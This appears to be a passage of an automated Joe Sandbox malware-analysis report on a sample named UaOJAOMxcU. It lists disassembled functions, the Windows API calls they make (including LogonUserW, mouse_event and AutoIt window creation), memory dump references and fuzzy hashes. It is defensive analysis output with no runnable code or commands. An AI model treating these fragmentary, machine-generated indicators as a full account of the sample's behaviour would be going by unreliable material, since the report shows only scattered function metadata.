                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                    • Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
                    • Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                    • Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99
                    Function 0042F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                    • Instruction ID: 9dbe1c865c2330f56ffee62ed517aae1867acb93b770053fb6672ec4a27fddfc
                    • Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                    • Instruction Fuzzy Hash: 08322861E29F114DD7239634D832336A258AFB73C8F95D737F819B5AA5EB28D4C34208
                    Function 0043242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                    • Instruction ID: 6c6381ca5121d9a8a5ca5470a2620081c1b3ce1be078dbaf297b8ac86cff2730
                    • Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                    • Instruction Fuzzy Hash: E2B10130E2AF414DD72396398935336BA5CAFBB2C5F51D72BFC2670D22EB2185934185
                    Function 00464C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: mouse_event
                    • String ID:
                    • API String ID: 2434400541-0
                    • Opcode ID: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                    • Instruction ID: b34e2a9394489d035c963e7dd8f40c9807a13273b0ab6c7f74163ad9f46ae88e
                    • Opcode Fuzzy Hash: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                    • Instruction Fuzzy Hash: BED05EA032220838ECA807209D5FF7F1109E3C0B81F96854B7241853C1F8DC6801A03F
                    Function 004587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: LogonUser
                    • String ID:
                    • API String ID: 1244722697-0
                    • Opcode ID: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                    • Instruction ID: bbaf709efb0beb88cdfa5f1a33ae6004459e2c5163e494cc38a8a30eb56211a1
                    • Opcode Fuzzy Hash: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                    • Instruction Fuzzy Hash: 49D05E3226050EAFEF018EA4DC01EAE3B69EB04B01F408521FE15D50A1C775E835AB60
                    Function 0042A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                    • Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
                    • Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                    • Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88
                    Function 00418808 Relevance: .6, Instructions: 590COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                    • Instruction ID: d3e05baf70842595a15b67714876080b4d37379fdc1224c105ba09137936e944
                    • Opcode Fuzzy Hash: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                    • Instruction Fuzzy Hash: 44223730904506CBDF288A68C4A47BEB7A1BF41345F28816FDD468B693DB7C9CD6C74A
                    Function 004221C5 Relevance: .3, Instructions: 345COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction ID: 35e5cfd0643d00128ec34ecd890c43f992cb4d917009b55117061340238bc551
                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction Fuzzy Hash: 18C1D83230507349DF2D4639953403FFAA15EA27B139A076FD8B3CB2D4EE18D965D624
                    Function 004225FA Relevance: .3, Instructions: 341COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction ID: 4494295b5c4546222a84ad3f443fcd2c01bced2acdb834a923f1c328fe2fc13d
                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction Fuzzy Hash: CAC1D4333090B34ADF2D4639953403FBAA15EA27B139B036FD4B2DB2D4EE18D925D624
                    Function 00C31060 Relevance: .1, Instructions: 92COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062769106.0000000000C2D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c2d000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                    • Instruction ID: 8f8b54af06051261bb940b7e2ede65a8d8b1cfb25d0b769c86729d70c5a466cf
                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                    • Instruction Fuzzy Hash: 4441A271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB50
                    Function 00C30F50 Relevance: .0, Instructions: 35COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062769106.0000000000C2D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c2d000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                    • Instruction ID: 7e5319877ec75e3a5a2dee7fc59e56635437743acf51705e4f5911c16efc0cc8
                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                    • Instruction Fuzzy Hash: 87018079A10109EFCB54DF98C5909AEF7F5FB88310F208699E819A7341D730AE41DB80
                    Function 00C30EF0 Relevance: .0, Instructions: 35COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062769106.0000000000C2D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c2d000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                    • Instruction ID: 337b75e7edf16e7119d62c6dfe8f0f82613ea98113912ccb791fb05b05ce6db6
                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                    • Instruction Fuzzy Hash: F6019279A11109EFCB58DF98C5909AEF7F5FB48310F208699E819A7341D730AE42DB80
                    Function 00C2F8C0 Relevance: .0, Instructions: 6COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062769106.0000000000C2D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c2d000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                    Function 00477806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 0047785B
                    • DeleteObject.GDI32(00000000), ref: 0047786D
                    • DestroyWindow.USER32 ref: 0047787B
                    • GetDesktopWindow.USER32 ref: 00477895
                    • GetWindowRect.USER32(00000000), ref: 0047789C
                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 004779DD
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004779ED
                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477A35
                    • GetClientRect.USER32(00000000,?), ref: 00477A41
                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00477A7B
                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477A9D
                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AB0
                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477ABB
                    • GlobalLock.KERNEL32(00000000), ref: 00477AC4
                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AD3
                    • GlobalUnlock.KERNEL32(00000000), ref: 00477ADC
                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AE3
                    • GlobalFree.KERNEL32(00000000), ref: 00477AEE
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477B00
                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00492CAC,00000000), ref: 00477B16
                    • GlobalFree.KERNEL32(00000000), ref: 00477B26
                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00477B4C
                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00477B6B
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477B8D
                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477D7A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                    • String ID: $AutoIt v3$DISPLAY$static
                    • API String ID: 2211948467-2373415609
                    • Opcode ID: cbe7ba0df42561e6311dda8264485de7e40118ff6f13b361737e76822355802e
                    • Instruction ID: 98d8c47751f1291c48596143d1a8e41d269c6aae9b6b01708d63eada7aa7ec2c
                    • Opcode Fuzzy Hash: cbe7ba0df42561e6311dda8264485de7e40118ff6f13b361737e76822355802e
                    • Instruction Fuzzy Hash: DE027A71900105EFDB14DFA4DC89EAE7BB9FF49310F10856AF905AB2A1C738AD41CB68
                    Function 0048356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
                    • IsWindowVisible.USER32(?), ref: 0048364B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: BuffCharUpperVisibleWindow
                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                    • API String ID: 4105515805-45149045
                    • Opcode ID: fed52f404a64f80c9a9dc2c1c4167444291c9d1648bc4a49fe8c5b5d29b77391
                    • Instruction ID: 9f5fdaa8788cae778637d634d7abea83d78ef325d3b9343814b8d9d38e530adb
                    • Opcode Fuzzy Hash: fed52f404a64f80c9a9dc2c1c4167444291c9d1648bc4a49fe8c5b5d29b77391
                    • Instruction Fuzzy Hash: 28D19E702042009BCA04FF11C451A6E77E5AF55759F54886EF8826B3A3DB3DEE0ACB5A
                    Function 0048A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                    Download Yara Rule
                    APIs
                    • SetTextColor.GDI32(?,00000000), ref: 0048A630
                    • GetSysColorBrush.USER32(0000000F), ref: 0048A661
                    • GetSysColor.USER32(0000000F), ref: 0048A66D
                    • SetBkColor.GDI32(?,000000FF), ref: 0048A687
                    • SelectObject.GDI32(?,00000000), ref: 0048A696
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
                    • GetSysColor.USER32(00000010), ref: 0048A6C9
                    • CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
                    • FrameRect.USER32(?,?,00000000), ref: 0048A6DF
                    • DeleteObject.GDI32(00000000), ref: 0048A6E6
                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
                    • FillRect.USER32(?,?,00000000), ref: 0048A763
                    • GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
                      • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
                      • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
                      • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                      • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
                      • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
                      • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                      • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
                      • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
                      • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
                      • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                      • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                      • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                      • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                    • String ID:
                    • API String ID: 3521893082-0
                    • Opcode ID: d0b98d0bd2d439f0e376530d70ac2fa86c41f3a1b8d0dc48bc9816d6a88522a1
                    • Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
                    • Opcode Fuzzy Hash: d0b98d0bd2d439f0e376530d70ac2fa86c41f3a1b8d0dc48bc9816d6a88522a1
                    • Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A
                    Function 00402C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                    • DeleteObject.GDI32(00000000), ref: 00402CE8
                    • DeleteObject.GDI32(00000000), ref: 00402CF3
                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D
                      • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                    • SendMessageW.USER32(?,00001053), ref: 0043C8DA
                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
